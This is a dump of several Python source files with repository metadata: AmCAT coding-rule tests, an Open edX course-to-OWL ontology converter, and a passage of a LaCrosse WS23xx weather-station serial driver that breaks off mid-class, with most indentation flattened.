self.assertFalse(schemarules_valid(schema))
def test_to_json(self):
import functools
o1, o2 = amcattest.create_test_code(), amcattest.create_test_code()
schema_with_fields = amcattest.create_test_schema_with_fields()
code_field = schema_with_fields[4]
c = functools.partial(self.condition, schema_with_fields[0])
tree = to_json(parse(c("{}=={}".format(code_field.id, o1.id))))
self.assertEquals(json.loads(tree), {"type": EQUALS, "values": [
{"type": "codingschemafield", "id": code_field.id},
{"type": "code", "id": o1.id}
]})
tree = parse(c("{}=={}".format(code_field.id, o1.id)))
self.assertEquals(json.dumps(to_json(tree, serialise=False)), to_json(tree))
def test_clean_tree(self):
import functools
o1, o2 = amcattest.create_test_code(), amcattest.create_test_code()
codebook, codebook_codes = amcattest.create_test_codebook_with_codes()
schema_with_fields = amcattest.create_test_schema_with_fields(codebook=codebook)
schema = schema_with_fields[0]
code_field = schema_with_fields[4]
c = functools.partial(self.condition, schema)
tree = parse(c("{code_field.id}=={o1.id}".format(**locals())))
self.assertRaises(ValidationError, clean_tree, schema, tree)
tree = parse(c("{code_field.id}=={code.id}".format(code_field=code_field, code=codebook.codes[0])))
self.assertEquals(clean_tree(schema, tree), None)
self.assertRaises(ValidationError, clean_tree, amcattest.create_test_schema_with_fields()[0], tree)
def test_parse(self):
import functools
o1, o2 = amcattest.create_test_code(), amcattest.create_test_code()
schema_with_fields = amcattest.create_test_schema_with_fields()
schema = schema_with_fields[0]
codebook = schema_with_fields[1]
text_field = schema_with_fields[2]
number_field = schema_with_fields[3]
code_field = schema_with_fields[4]
c = functools.partial(self.condition, schema)
# Empty conditions should return None
self.assertEquals(parse(c("")), None)
self.assertEquals(parse(c("()")), None)
# Recursion should be checked for
cr = CodingRule.objects.create(codingschema=schema, label="foo", condition="()")
cr.condition = str(cr.id)
self.assertRaises(SyntaxError, parse, cr)
        # Nonexistent fields should raise an error
cr.condition = "0==2"
self.assertRaises(CodingSchemaField.DoesNotExist, parse, cr)
cr.condition = "{}==0".format(code_field.id)
self.assertRaises(Code.DoesNotExist, parse, cr)
cr.condition = "0"
self.assertRaises(CodingRule.DoesNotExist, parse, cr)
cr.condition = "{}=={}".format(code_field.id, o1.id)
self.assertTrue(parse(cr) is not None)
# Wrong inputs for fields should raise an error
for inp in ("'a'", "0.2", "u'a'"):
cr.condition = "{}=={}".format(number_field.id, inp)
self.assertRaises(SyntaxError, parse, cr)
for inp in ("'a'", "0.2", "u'a'", repr(str(o1.id))):
cr.condition = "{}=={}".format(code_field.id, inp)
self.assertRaises(SyntaxError, parse, cr)
for inp in ("'a'", "0.2", "2"):
cr.condition = "{}=={}".format(text_field.id, inp)
self.assertRaises(SyntaxError, parse, cr)
# "Good" inputs shoudl not yield an error
for field, inp in ((number_field, 1), (text_field, "u'a'"), (code_field, o1.id)):
cr.condition = "{}=={}".format(field.id, inp)
self.assertTrue(parse(cr) is not None)
# Should accept Python-syntax (comments, etc)
cr.condition = """{}==(
# This should be a comment)
{})""".format(text_field.id, "u'a'")
self.assertTrue(parse(cr) is not None)
## Testing output
tree = parse(c("not {}".format(cr.id)))
self.assertEquals(tree["type"], NOT)
self.assertTrue(not isinstance(tree["value"], CodingRule))
tree = parse(c("{}=={}".format(text_field.id, "u'a'")))
self.assertEquals(tree, {"type": EQUALS, "values": (text_field, u'a')})
cr.save()
tree = parse(c("{cr.id} or {cr.id}".format(cr=cr)))
self.assertEquals(tree, {"type": OR, "values": (parse(cr), parse(cr))})
# Should accept greater than / greater or equal to / ...
parse(c("{number_field.id} > 5".format(**locals())))
parse(c("{number_field.id} < 5".format(**locals())))
parse(c("{number_field.id} >= 5".format(**locals())))
parse(c("{number_field.id} <= 5".format(**locals())))
# ..but not if schemafieldtype is text or code
self.assertRaises(SyntaxError, parse, c("{text_field.id} > 5".format(**locals())))
self.assertRaises(SyntaxError, parse, c("{code_field.id} > 5".format(**locals())))
|
amcat/amcat
|
amcat/models/coding/tests/codingruletoolkit.py
|
Python
|
agpl-3.0
| 7,493 | 0.001735 |
import json
from owlready import *
# input parameters
file_path = sys.argv[1]
onto_path = sys.argv[2]
# load ontology
onto = get_ontology(onto_path).load()
# course found list
course_ids = []
# for each course, find the active version (avoid multiple instances of one course)
with open(file_path + '/modulestore.active_versions.json','r') as f:
for line in f:
course = json.loads(line)
# for one course, only use its published version
course_id = course['versions']['published-branch']['$oid']
course_ids.append([course_id,'-v'+str(course['schema_version'])+':'+course['org']+'+'+course['course']+'+'+course['run']])
f.closed
for one_course in course_ids:
course_id = one_course[0]
# for each publish version we found, search for its structure data in json file
with open(file_path + '/modulestore.structures.json', 'r') as f:
for line in f:
obj = json.loads(line)
if obj['_id']['$oid'] == course_id:
                # temporarily save this data to a json file
print('=======Find one=======')
print(course_id)
with open(file_path + '/' + course_id + '.json', 'w+') as fout:
json.dump(obj,fout)
fout.closed
break
f.closed
# function to find an instance by its id
def find_obj_by_oid(obj_list, obj_oid):
for one_obj in obj_list:
if one_obj.name == obj_oid:
return one_obj
return None
# function to find an instance by its xml name
def find_obj_by_xml_id(obj_list, obj_xml_id, obj_name):
for one_obj in obj_list:
if hasattr(one_obj, obj_name + '_xml_id') and getattr(one_obj, obj_name + '_xml_id')[0] == obj_xml_id:
return one_obj
return None
# for each course we found
for one_course in course_ids:
course_id = one_course[0]
# open its structure json file
print('===========deal with course : ' + course_id + '===========')
with open(file_path + '/' + course_id + '.json','r') as f:
for line in f:
obj = json.loads(line)
# find all its blocks
blocks = obj['blocks']
for block in blocks:
                # for each block, if its type is defined in the ontology
obj_name = block['block_type']
if ('course_model.' + obj_name) in str(onto.classes):
obj_oid = block['definition']['$oid']
obj_xml_id = block['block_id']
# create an ontology individual for this block
temp_obj = getattr(onto, obj_name)(obj_oid)
# set xml id data property
getattr(temp_obj, obj_name+'_xml_id').append(obj_xml_id)
# set display name property
if 'display_name' in block['fields'].keys():
obj_display_name = block['fields']['display_name']
getattr(temp_obj,obj_name+'_display_name').append(obj_display_name)
# if this instance is a course
if obj_name == 'course':
temp_id = obj_xml_id + str(one_course[1])
course_org = temp_id.split(':')[-1].split('+')[0]
course_tag = temp_id.split(':')[-1].split('+')[1]
# set course id, course org and course tag
getattr(temp_obj,obj_name+'_id').append(temp_id)
getattr(temp_obj,obj_name+'_org').append(course_org)
getattr(temp_obj,obj_name+'_tag').append(course_tag)
# create object property
for block in blocks:
obj_name = block['block_type']
if ('course_model.' + obj_name) in str(onto.classes):
obj_oid = block['definition']['$oid']
obj_list = onto.instances
temp_obj = find_obj_by_oid(obj_list, obj_oid)
# find sub-level instance of this block
temp_sub_obj_list = block['fields']['children']
for sub_obj in block['fields']['children']:
sub_obj_name = sub_obj[0]
sub_obj_xml_id = sub_obj[1]
sub_obj_list = onto.instances
temp_sub_obj = find_obj_by_xml_id(sub_obj_list, sub_obj_xml_id, sub_obj_name)
if obj_name == 'vertical':
temp_sub_obj_name = 'xblock'
else:
temp_sub_obj_name = sub_obj_name
if temp_sub_obj is not None:
# create object property
getattr(temp_obj,'has_' + temp_sub_obj_name).append(temp_sub_obj)
f.closed
onto.save()
|
lazzyCloud/SLR
|
db2owl/course_json2owl.py
|
Python
|
agpl-3.0
| 4,862 | 0.004319 |
#!/usr/bin/env python
#
# Copyright 2013 Matthew Wall
# See the file LICENSE.txt for your full rights.
#
# Thanks to Kenneth Lavrsen for the Open2300 implementation:
# http://www.lavrsen.dk/foswiki/bin/view/Open2300/WebHome
# description of the station communication interface:
# http://www.lavrsen.dk/foswiki/bin/view/Open2300/OpenWSAPI
# memory map:
# http://www.lavrsen.dk/foswiki/bin/view/Open2300/OpenWSMemoryMap
#
# Thanks to Russell Stuart for the ws2300 python implementation:
# http://ace-host.stuart.id.au/russell/files/ws2300/
# and the map of the station memory:
# http://ace-host.stuart.id.au/russell/files/ws2300/memory_map_2300.txt
#
# This implementation copies directly from Russell Stuart's implementation,
# but only the parts required to read from and write to the weather station.
"""Classes and functions for interfacing with WS-23xx weather stations.
LaCrosse made a number of stations in the 23xx series, including:
WS-2300, WS-2308, WS-2310, WS-2315, WS-2317, WS-2357
The stations were also sold as the TFA Matrix and TechnoLine 2350.
The WWVB receiver is located in the console.
To synchronize the console and sensors, press and hold the PLUS key for 2
seconds. When console is not synchronized no data will be received.
To do a factory reset, press and hold PRESSURE and WIND for 5 seconds.
A single bucket tip is 0.0204 in (0.518 mm).
The station has 175 history records. That is just over 7 days of data with
the default history recording interval of 60 minutes.
The station supports both wireless and wired communication between the
sensors and a station console. Wired connection updates data every 8 seconds.
Wireless connection updates data in 16 to 128 second intervals, depending on
wind speed and rain activity.
The connection type can be one of 0=cable, 3=lost, 15=wireless
sensor update frequency:
32 seconds when wind speed > 22.36 mph (wireless)
128 seconds when wind speed < 22.36 mph (wireless)
10 minutes (wireless after 5 failed attempts)
8 seconds (wired)
console update frequency:
15 seconds (pressure/temperature)
20 seconds (humidity)
It is possible to increase the rate of wireless updates:
http://www.wxforum.net/index.php?topic=2196.0
Sensors are connected by unshielded phone cables. RF interference can cause
random spikes in data, with one symptom being values of 25.5 m/s or 91.8 km/h
for the wind speed. Unfortunately those values are within the sensor limits
of 0-113 mph (50.52 m/s or 181.9 km/h). To reduce the number of spikes in
data, replace with shielded cables:
http://www.lavrsen.dk/sources/weather/windmod.htm
The station records wind speed and direction, but has no notion of gust.
The station calculates windchill and dewpoint.
The station has a serial connection to the computer.
This driver does not keep the serial port open for long periods. Instead, the
driver opens the serial port, reads data, then closes the port.
This driver polls the station. Use the polling_interval parameter to specify
how often to poll for data. If not specified, the polling interval will adapt
based on connection type and status.
USB-Serial Converters
With a USB-serial converter one can connect the station to a computer with
only USB ports, but not every converter will work properly. Perhaps the two
most common converters are based on the Prolific and FTDI chipsets. Many
people report better luck with the FTDI-based converters. Some converters
that use the Prolific chipset (PL2303) will work, but not all of them.
Known to work: ATEN UC-232A
Bounds checking
wind speed: 0-113 mph
wind direction: 0-360
humidity: 0-100
temperature: ok if not -22F and humidity is valid
dewpoint: ok if not -22F and humidity is valid
barometer: 25-35 inHg
rain rate: 0-10 in/hr
Discrepancies Between Implementations
As of December 2013, there are significant differences between the open2300,
wview, and ws2300 implementations. Current version numbers are as follows:
open2300 1.11
ws2300 1.8
wview 5.20.2
History Interval
The factory default is 60 minutes. The value stored in the console is one
less than the actual value (in minutes). So for the factory default of 60,
the console stores 59. The minimum interval is 1.
ws2300.py reports the actual value from the console, e.g., 59 when the
interval is 60. open2300 reports the interval, e.g., 60 when the interval
is 60. wview ignores the interval.
Detecting Bogus Sensor Values
wview queries the station 3 times for each sensor then accepts the value only
if the three values were close to each other.
open2300 sleeps 10 seconds if a wind measurement indicates invalid or overflow.
The ws2300.py implementation includes overflow and validity flags for values
from the wind sensors. It does not retry based on invalid or overflow.
Wind Speed
There is disagreement about how to calculate wind speed and how to determine
whether the wind speed is valid.
This driver introduces a WindConversion object that uses open2300/wview
decoding so that wind speeds match that of open2300/wview. ws2300 1.8
incorrectly uses bcd2num instead of bin2num. This bug is fixed in this driver.
The memory map indicates the following:
addr smpl description
0x527 0 Wind overflow flag: 0 = normal
0x528 0 Wind minimum code: 0=min, 1=--.-, 2=OFL
0x529 0 Windspeed: binary nibble 0 [m/s * 10]
0x52A 0 Windspeed: binary nibble 1 [m/s * 10]
0x52B 0 Windspeed: binary nibble 2 [m/s * 10]
0x52C 8 Wind Direction = nibble * 22.5 degrees
0x52D 8 Wind Direction 1 measurement ago
0x52E 9 Wind Direction 2 measurement ago
0x52F 8 Wind Direction 3 measurement ago
0x530 7 Wind Direction 4 measurement ago
0x531 7 Wind Direction 5 measurement ago
0x532 0
wview 5.20.2 implementation (wview apparently copied from open2300):
read 3 bytes starting at 0x527
0x527 x[0]
0x528 x[1]
0x529 x[2]
if ((x[0] != 0x00) ||
((x[1] == 0xff) && (((x[2] & 0xf) == 0) || ((x[2] & 0xf) == 1)))) {
fail
} else {
dir = (x[2] >> 4) * 22.5
speed = ((((x[2] & 0xf) << 8) + (x[1])) / 10.0 * 2.23693629)
maxdir = dir
maxspeed = speed
}
open2300 1.10 implementation:
read 6 bytes starting at 0x527
0x527 x[0]
0x528 x[1]
0x529 x[2]
0x52a x[3]
0x52b x[4]
0x52c x[5]
if ((x[0] != 0x00) ||
((x[1] == 0xff) && (((x[2] & 0xf) == 0) || ((x[2] & 0xf) == 1)))) {
sleep 10
} else {
dir = x[2] >> 4
speed = ((((x[2] & 0xf) << 8) + (x[1])) / 10.0)
dir0 = (x[2] >> 4) * 22.5
dir1 = (x[3] & 0xf) * 22.5
dir2 = (x[3] >> 4) * 22.5
dir3 = (x[4] & 0xf) * 22.5
dir4 = (x[4] >> 4) * 22.5
dir5 = (x[5] & 0xf) * 22.5
}
ws2300.py 1.8 implementation:
read 1 nibble starting at 0x527
read 1 nibble starting at 0x528
read 4 nibble starting at 0x529
read 3 nibble starting at 0x529
read 1 nibble starting at 0x52c
read 1 nibble starting at 0x52d
read 1 nibble starting at 0x52e
read 1 nibble starting at 0x52f
read 1 nibble starting at 0x530
read 1 nibble starting at 0x531
0x527 overflow
0x528 validity
0x529 speed[0]
0x52a speed[1]
0x52b speed[2]
0x52c dir[0]
speed: ((x[2] * 100 + x[1] * 10 + x[0]) % 1000) / 10
velocity: (x[2] * 100 + x[1] * 10 + x[0]) / 10
dir = data[0] * 22.5
speed = (bcd2num(data) % 10**3 + 0) / 10**1
velocity = (bcd2num(data[:3])/10.0, bin2num(data[3:4]) * 22.5)
bcd2num([a,b,c]) -> c*100+b*10+a
"""
# TODO: use pyserial instead of LinuxSerialPort
# TODO: put the __enter__ and __exit__ scaffolding on serial port, not Station
# FIXME: unless we can get setTime to work, just ignore the console clock
# FIXME: detect bogus wind speed/direction
# I see these when the wind instrument is disconnected:
# ws 26.399999
# wsh 21
# w0 135
from __future__ import with_statement
import logging
import time
import string
import fcntl
import os
import select
import struct
import termios
import tty
from nimbusdrivers import *
DRIVER_NAME = 'WS23xx'
DRIVER_VERSION = '0.24'
def loader(config_dict):
return WS23xxDriver(config_dict=config_dict, **config_dict[DRIVER_NAME])
DEFAULT_PORT = '/dev/ttyUSB0'
def logdbg(msg):
logging.debug(msg)
def loginf(msg):
logging.info(msg)
def logcrt(msg):
logging.critical(msg)
def logerr(msg):
logging.error(msg)
class WS23xxDriver(AbstractDevice):
"""Driver for LaCrosse WS23xx stations."""
def __init__(self, **stn_dict):
"""Initialize the station object.
port: The serial port, e.g., /dev/ttyS0 or /dev/ttyUSB0
[Required. Default is /dev/ttyS0]
polling_interval: How often to poll the station, in seconds.
[Optional. Default is 8 (wired) or 30 (wireless)]
model: Which station model is this?
[Optional. Default is 'LaCrosse WS23xx']
"""
self._last_rain = None
self._last_cn = None
self._poll_wait = 60
self.model = stn_dict.get('model', 'LaCrosse WS23xx')
self.port = stn_dict.get('port', DEFAULT_PORT)
self.max_tries = int(stn_dict.get('max_tries', 5))
self.retry_wait = int(stn_dict.get('retry_wait', 30))
self.polling_interval = stn_dict.get('polling_interval', None)
if self.polling_interval is not None:
self.polling_interval = int(self.polling_interval)
self.enable_startup_records = stn_dict.get('enable_startup_records',
True)
self.enable_archive_records = stn_dict.get('enable_archive_records',
True)
self.mode = stn_dict.get('mode', 'single_open')
loginf('driver version is %s' % DRIVER_VERSION)
loginf('serial port is %s' % self.port)
loginf('polling interval is %s' % self.polling_interval)
if self.mode == 'single_open':
self.station = WS23xx(self.port)
else:
self.station = None
def closePort(self):
if self.station is not None:
self.station.close()
self.station = None
@property
def hardware_name(self):
return self.model
# weewx wants the archive interval in seconds, but the console uses minutes
@property
def archive_interval(self):
if not self.enable_startup_records and not self.enable_archive_records:
raise NotImplementedError
return self.getArchiveInterval() * 60
def genLoopPackets(self):
ntries = 0
while ntries < self.max_tries:
ntries += 1
try:
if self.station:
data = self.station.get_raw_data(SENSOR_IDS)
else:
with WS23xx(self.port) as s:
data = s.get_raw_data(SENSOR_IDS)
packet = data_to_packet(data, int(time.time() + 0.5),
last_rain=self._last_rain)
self._last_rain = packet['rainTotal']
ntries = 0
yield packet
if self.polling_interval is not None:
self._poll_wait = self.polling_interval
if data['cn'] != self._last_cn:
conn_info = get_conn_info(data['cn'])
loginf("connection changed from %s to %s" %
(get_conn_info(self._last_cn)[0], conn_info[0]))
self._last_cn = data['cn']
if self.polling_interval is None:
loginf("using %s second polling interval"
" for %s connection" %
(conn_info[1], conn_info[0]))
self._poll_wait = conn_info[1]
time.sleep(self._poll_wait)
except Ws2300.Ws2300Exception, e:
logerr("Failed attempt %d of %d to get LOOP data: %s" %
(ntries, self.max_tries, e))
logdbg("Waiting %d seconds before retry" % self.retry_wait)
time.sleep(self.retry_wait)
else:
msg = "Max retries (%d) exceeded for LOOP data" % self.max_tries
logerr(msg)
raise RetriesExceeded(msg)
def genStartupRecords(self):
since_ts = 0
if not self.enable_startup_records:
raise NotImplementedError
if self.station:
return self.genRecords(self.station, since_ts)
else:
with WS23xx(self.port) as s:
return self.genRecords(s, since_ts)
def genRecords(self, s, since_ts, count=0):
last_rain = None
for ts, data in s.gen_records(since_ts=since_ts, count=count):
record = data_to_packet(data, ts, last_rain=last_rain)
record['interval'] = data['interval']
last_rain = record['rainTotal']
yield record
# def getTime(self) :
# with WS23xx(self.port) as s:
# return s.get_time()
# def setTime(self):
# with WS23xx(self.port) as s:
# s.set_time()
def getArchiveInterval(self):
if self.station:
return self.station.get_archive_interval()
else:
with WS23xx(self.port) as s:
return s.get_archive_interval()
def setArchiveInterval(self, interval):
if self.station:
self.station.set_archive_interval(interval)
else:
with WS23xx(self.port) as s:
s.set_archive_interval(interval)
def getConfig(self):
fdata = dict()
if self.station:
data = self.station.get_raw_data(Measure.IDS.keys())
else:
with WS23xx(self.port) as s:
data = s.get_raw_data(Measure.IDS.keys())
for key in data:
fdata[Measure.IDS[key].name] = data[key]
return fdata
def getRecordCount(self):
if self.station:
return self.station.get_record_count()
else:
with WS23xx(self.port) as s:
return s.get_record_count()
def clearHistory(self):
if self.station:
self.station.clear_memory()
else:
with WS23xx(self.port) as s:
s.clear_memory()
# ids for current weather conditions and connection type
SENSOR_IDS = ['it','ih','ot','oh','pa','wind','rh','rt','dp','wc','cn']
# polling interval, in seconds, for various connection types
POLLING_INTERVAL = {0: ("cable", 8), 3: ("lost", 60), 15: ("wireless", 30)}
def get_conn_info(conn_type):
return POLLING_INTERVAL.get(conn_type, ("unknown", 60))
def data_to_packet(data, ts, last_rain=None):
"""Convert raw data to format and units required by weewx.
station weewx (metric)
temperature degree C degree C
humidity percent percent
uv index unitless unitless
pressure mbar mbar
wind speed m/s km/h
wind dir degree degree
wind gust None
wind gust dir None
rain mm cm
rain rate cm/h
"""
packet = dict()
packet['units'] = METRIC
packet['dateTime'] = ts
packet['inTemp'] = data['it']
packet['inHumidity'] = data['ih']
packet['outTemp'] = data['ot']
packet['outHumidity'] = data['oh']
packet['pressure'] = data['pa']
ws, wd, wso, wsv = data['wind']
if wso == 0 and wsv == 0:
packet['windSpeed'] = ws
if packet['windSpeed'] is not None:
packet['windSpeed'] *= 3.6 # weewx wants km/h
packet['windDir'] = wd if packet['windSpeed'] else None
else:
loginf('invalid wind reading: speed=%s dir=%s overflow=%s invalid=%s' %
(ws, wd, wso, wsv))
packet['windSpeed'] = None
packet['windDir'] = None
packet['windGust'] = None
packet['windGustDir'] = None
packet['rainTotal'] = data['rt']
if packet['rainTotal'] is not None:
packet['rainTotal'] /= 10 # weewx wants cm
    if packet['rainTotal'] is not None and last_rain is not None:
        packet['rain'] = packet['rainTotal'] - last_rain
    else:
        # no delta available on the first reading or without a valid total
        packet['rain'] = None
# station provides some derived variables
packet['rainRate'] = data['rh']
if packet['rainRate'] is not None:
packet['rainRate'] /= 10 # weewx wants cm/hr
packet['dewpoint'] = data['dp']
packet['windchill'] = data['wc']
return packet
class WS23xx(object):
"""Wrap the Ws2300 object so we can easily open serial port, read/write,
close serial port without all of the try/except/finally scaffolding."""
def __init__(self, port):
logdbg('create LinuxSerialPort')
self.serial_port = LinuxSerialPort(port)
logdbg('create Ws2300')
self.ws = Ws2300(self.serial_port)
def __enter__(self):
logdbg('station enter')
return self
def __exit__(self, type_, value, traceback):
logdbg('station exit')
self.ws = None
self.close()
def close(self):
logdbg('close LinuxSerialPort')
self.serial_port.close()
self.serial_port = None
def set_time(self, ts):
"""Set station time to indicated unix epoch."""
for m in [Measure.IDS['sd'], Measure.IDS['st']]:
data = m.conv.value2binary(ts)
cmd = m.conv.write(data, None)
self.ws.write_safe(m.address, *cmd[1:])
def get_time(self):
"""Return station time as unix epoch."""
data = self.get_raw_data(['sw'])
ts = int(data['sw'])
return ts
def set_archive_interval(self, interval):
"""Set the archive interval in minutes."""
if int(interval) < 1:
raise ValueError('archive interval must be greater than zero')
logdbg('setting hardware archive interval to %s minutes' % interval)
interval -= 1
for m,v in [(Measure.IDS['hi'],interval), # archive interval in minutes
(Measure.IDS['hc'],1), # time till next sample in minutes
(Measure.IDS['hn'],0)]: # number of valid records
data = m.conv.value2binary(v)
cmd = m.conv.write(data, None)
self.ws.write_safe(m.address, *cmd[1:])
def get_archive_interval(self):
"""Return archive interval in minutes."""
data = self.get_raw_data(['hi'])
x = 1 + int(data['hi'])
logdbg('station archive interval is %s minutes' % x)
return x
def clear_memory(self):
"""Clear station memory."""
logdbg('clearing console memory')
for m,v in [(Measure.IDS['hn'],0)]: # number of valid records
data = m.conv.value2binary(v)
cmd = m.conv.write(data, None)
self.ws.write_safe(m.address, *cmd[1:])
def get_record_count(self):
data = self.get_raw_data(['hn'])
x = int(data['hn'])
logdbg('record count is %s' % x)
return x
def gen_records(self, since_ts=None, count=None, use_computer_clock=True):
"""Get latest count records from the station from oldest to newest. If
count is 0 or None, return all records.
The station has a history interval, and it records when the last
history sample was saved. So as long as the interval does not change
between the first and last records, we are safe to infer timestamps
for each record. This assumes that if the station loses power then
the memory will be cleared.
There is no timestamp associated with each record - we have to guess.
The station tells us the time until the next record and the epoch of
the latest record, based on the station's clock. So we can use that
or use the computer clock to guess the timestamp for each record.
To ensure accurate data, the first record must be read within one
minute of the initial read and the remaining records must be read
within numrec * interval minutes.
"""
logdbg("gen_records: since_ts=%s count=%s clock=%s" %
(since_ts, count, use_computer_clock))
measures = [Measure.IDS['hi'], Measure.IDS['hw'],
Measure.IDS['hc'], Measure.IDS['hn']]
raw_data = read_measurements(self.ws, measures)
interval = 1 + int(measures[0].conv.binary2value(raw_data[0])) # minute
latest_ts = int(measures[1].conv.binary2value(raw_data[1])) # epoch
time_to_next = int(measures[2].conv.binary2value(raw_data[2])) # minute
numrec = int(measures[3].conv.binary2value(raw_data[3]))
now = int(time.time())
cstr = 'station'
if use_computer_clock:
latest_ts = now - (interval - time_to_next) * 60
cstr = 'computer'
if not count:
count = HistoryMeasure.MAX_HISTORY_RECORDS
if since_ts is not None:
count = int((now - since_ts) / (interval * 60))
if count == 0:
return
if count > numrec:
count = numrec
if count > HistoryMeasure.MAX_HISTORY_RECORDS:
count = HistoryMeasure.MAX_HISTORY_RECORDS
# station is about to overwrite first record, so skip it
if time_to_next <= 1 and count == HistoryMeasure.MAX_HISTORY_RECORDS:
count -= 1
logdbg("downloading %d records from station" % count)
HistoryMeasure.set_constants(self.ws)
measures = [HistoryMeasure(n) for n in range(count-1, -1, -1)]
raw_data = read_measurements(self.ws, measures)
last_ts = latest_ts - (count-1) * interval * 60
for measure, nybbles in zip(measures, raw_data):
value = measure.conv.binary2value(nybbles)
data_dict = {
'interval': interval,
'it': value.temp_indoor,
'ih': value.humidity_indoor,
'ot': value.temp_outdoor,
'oh': value.humidity_outdoor,
'pa': value.pressure_absolute,
'rt': value.rain,
'wind': (value.wind_speed/10, value.wind_direction, 0, 0),
'rh': None, # no rain rate in history
'dp': None, # no dewpoint in history
'wc': None, # no windchill in history
}
yield last_ts, data_dict
last_ts += interval * 60
def get_raw_data(self, labels):
"""Get raw data from the station, return as dictionary."""
measures = [Measure.IDS[m] for m in labels]
raw_data = read_measurements(self.ws, measures)
data_dict = dict(zip(labels, [m.conv.binary2value(d) for m, d in zip(measures, raw_data)]))
return data_dict
# =============================================================================
# The following code was adapted from ws2300.py by Russell Stuart
# =============================================================================
VERSION = "1.8 2013-08-26"
#
# Debug options.
#
DEBUG_SERIAL = False
#
# A fatal error.
#
class FatalError(StandardError):
source = None
message = None
cause = None
def __init__(self, source, message, cause=None):
self.source = source
self.message = message
self.cause = cause
StandardError.__init__(self, message)
#
# The serial port interface. We can talk to the Ws2300 over anything
# that implements this interface.
#
class SerialPort(object):
#
# Discard all characters waiting to be read.
#
def clear(self): raise NotImplementedError()
#
# Close the serial port.
#
def close(self): raise NotImplementedError()
#
# Wait for all characters to be sent.
#
def flush(self): raise NotImplementedError()
#
# Read a character, waiting for a most timeout seconds. Return the
# character read, or None if the timeout occurred.
#
def read_byte(self, timeout): raise NotImplementedError()
#
# Release the serial port. Closes it until it is used again, when
# it is automatically re-opened. It need not be implemented.
#
def release(self): pass
#
# Write characters to the serial port.
#
def write(self, data): raise NotImplementedError()
#
# A Linux Serial port. Implements the Serial interface on Linux.
#
class LinuxSerialPort(SerialPort):
SERIAL_CSIZE = {
"7": tty.CS7,
"8": tty.CS8, }
SERIAL_PARITIES= {
"e": tty.PARENB,
"n": 0,
"o": tty.PARENB|tty.PARODD, }
SERIAL_SPEEDS = {
"300": tty.B300,
"600": tty.B600,
"1200": tty.B1200,
"2400": tty.B2400,
"4800": tty.B4800,
"9600": tty.B9600,
"19200": tty.B19200,
"38400": tty.B38400,
"57600": tty.B57600,
"115200": tty.B115200, }
SERIAL_SETTINGS = "2400,n,8,1"
device = None # string, the device name.
    orig_settings = None # list, the original port's settings.
select_list = None # list, The serial ports
serial_port = None # int, OS handle to device.
settings = None # string, the settings on the command line.
#
# Initialise ourselves.
#
def __init__(self,device,settings=SERIAL_SETTINGS):
self.device = device
self.settings = settings.split(",")
self.settings.extend([None,None,None])
self.settings[0] = self.__class__.SERIAL_SPEEDS.get(self.settings[0], None)
self.settings[1] = self.__class__.SERIAL_PARITIES.get(self.settings[1].lower(), None)
self.settings[2] = self.__class__.SERIAL_CSIZE.get(self.settings[2], None)
if len(self.settings) != 7 or None in self.settings[:3]:
raise FatalError(self.device, 'Bad serial settings "%s".' % settings)
self.settings = self.settings[:4]
#
# Open the port.
#
try:
self.serial_port = os.open(self.device, os.O_RDWR)
except EnvironmentError, e:
raise FatalError(self.device, "can't open tty device - %s." % str(e))
try:
fcntl.flock(self.serial_port, fcntl.LOCK_EX)
self.orig_settings = tty.tcgetattr(self.serial_port)
setup = self.orig_settings[:]
setup[0] = tty.INPCK
setup[1] = 0
setup[2] = tty.CREAD|tty.HUPCL|tty.CLOCAL|reduce(lambda x,y: x|y, self.settings[:3])
setup[3] = 0 # tty.ICANON
setup[4] = self.settings[0]
setup[5] = self.settings[0]
setup[6] = ['\000']*len(setup[6])
setup[6][tty.VMIN] = 1
setup[6][tty.VTIME] = 0
tty.tcflush(self.serial_port, tty.TCIOFLUSH)
#
# Restart IO if stopped using software flow control (^S/^Q). This
# doesn't work on FreeBSD.
#
try:
tty.tcflow(self.serial_port, tty.TCOON|tty.TCION)
except termios.error:
pass
tty.tcsetattr(self.serial_port, tty.TCSAFLUSH, setup)
#
# Set DTR low and RTS high and leave other control lines untouched.
#
arg = struct.pack('I', 0)
arg = fcntl.ioctl(self.serial_port, tty.TIOCMGET, arg)
portstatus = struct.unpack('I', arg)[0]
portstatus = portstatus & ~tty.TIOCM_DTR | tty.TIOCM_RTS
arg = struct.pack('I', portstatus)
fcntl.ioctl(self.serial_port, tty.TIOCMSET, arg)
self.select_list = [self.serial_port]
except Exception:
os.close(self.serial_port)
raise
def close(self):
if self.orig_settings:
tty.tcsetattr(self.serial_port, tty.TCSANOW, self.orig_settings)
os.close(self.serial_port)
def read_byte(self, timeout):
ready = select.select(self.select_list, [], [], timeout)
if not ready[0]:
return None
return os.read(self.serial_port, 1)
#
# Write a string to the port.
#
def write(self, data):
os.write(self.serial_port, data)
#
# Flush the input buffer.
#
def clear(self):
tty.tcflush(self.serial_port, tty.TCIFLUSH)
#
# Flush the output buffer.
#
def flush(self):
tty.tcdrain(self.serial_port)
#
# This class reads and writes bytes to a Ws2300. It is passed something
# that implements the Serial interface. The major routines are:
#
# Ws2300() - Create one of these objects that talks over the serial port.
# read_batch() - Reads data from the device using an scatter/gather interface.
# write_safe() - Writes data to the device.
#
class Ws2300(object):
#
# An exception for us.
#
class Ws2300Exception(WeeWxIOError):
def __init__(self, *args):
WeeWxIOError.__init__(self, *args)
#
# Constants we use.
#
MAXBLOCK = 30
MAXRETRIES = 50
MAXWINDRETRIES= 20
WRITENIB = 0x42
SETBIT = 0x12
UNSETBIT = 0x32
WRITEACK = 0x10
SETACK = 0x04
UNSETACK = 0x0C
RESET_MIN = 0x01
RESET_MAX = 0x02
MAX_RESETS = 100
#
# Instance data.
#
log_buffer = None # list, action log
log_mode = None # string, Log mode
    log_nest = None # int, Nesting of log actions
    serial_port = None # SerialPort, port to use
#
# Initialise ourselves.
#
def __init__(self,serial_port):
self.log_buffer = []
self.log_nest = 0
self.serial_port = serial_port
#
# Write data to the device.
#
def write_byte(self,data):
if self.log_mode != 'w':
if self.log_mode != 'e':
self.log(' ')
self.log_mode = 'w'
self.log("%02x" % ord(data))
self.serial_port.write(data)
#
# Read a byte from the device.
#
def read_byte(self, timeout=1.0):
if self.log_mode != 'r':
self.log_mode = 'r'
self.log(':')
result = self.serial_port.read_byte(timeout)
if result == None:
self.log("--")
else:
self.log("%02x" % ord(result))
return result
#
# Remove all pending incoming characters.
#
def clear_device(self):
if self.log_mode != 'e':
self.log(' ')
self.log_mode = 'c'
self.log("C")
self.serial_port.clear()
#
# Write a reset string and wait for a reply.
#
def reset_06(self):
